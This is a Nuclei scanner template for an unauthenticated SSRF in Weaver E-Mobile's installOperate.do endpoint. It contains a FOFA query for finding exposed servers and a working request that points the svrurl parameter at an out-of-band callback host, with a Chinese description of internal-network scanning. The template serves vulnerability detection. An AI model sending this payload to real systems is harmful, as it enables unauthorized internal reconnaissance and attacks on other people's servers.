id: Weaver-E-Mobile-installOperate-ssrf
info:
  name: 泛微E-Mobile installOperate.do SSRF漏洞
  author: Superhero
  severity: high
  description: |-
    fofa：header="EMobileServer"
    泛微E-Mobile installOperate.do 接口处存在服务器请求伪造漏洞，未经身份验证的远程攻击者利用此漏洞扫描服务器所在的内网或本地端口，获取服务的banner信息，窥探网络结构，甚至对内网或本地运行的应用程序发起攻击，获取服务器内部敏感配置，造成信息泄露。
  reference:
    - https://blog.csdn.net/m0_60571842/article/details/140707041
  tags: SSRF

http:
  - raw:
      - |
        GET /install/installOperate.do?svrurl=http://{{interactsh-url}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: interactsh_protocol
        words:
        - "dns"






